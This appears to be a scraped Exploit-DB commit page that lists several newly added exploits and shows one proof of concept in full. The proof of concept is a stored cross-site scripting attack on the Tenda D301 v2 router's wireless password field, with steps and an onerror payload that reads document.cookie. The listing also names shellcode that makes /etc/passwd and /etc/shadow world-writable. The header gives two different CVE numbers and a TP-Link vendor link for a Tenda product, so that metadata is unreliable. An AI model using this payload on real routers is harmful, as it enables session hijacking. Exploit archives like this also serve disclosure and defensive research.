978c16266a
9 changes to exploits/shellcodes Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation Xymon 4.3.25 - useradm Command Execution (Metasploit) Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting Sahi Pro 8.0.0 - Remote Command Execution Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)
17 lines
No EOL
806 B
Text
17 lines
No EOL
806 B
Text
# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
|
|
# Exploit Author: ABDO10
|
|
# Date : July, 11th 2019
|
|
# Product : Tenda D301 v2 Modem Router
|
|
# version : v2
|
|
# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
|
|
# Tested on: Linux
|
|
# CVE : 2019-13491
|
|
|
|
|
|
# Poc Instructions :
|
|
/*******************************************************************************************************************/
|
|
> 1 - Open modem router on web browser default(192.168.1.1)
|
|
> 2 - Click on advanced -> Wireless -> Security
|
|
> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)> as password
|
|
> 4 - Click on "click to display"
|
|
/*******************************************************************************************************************/ |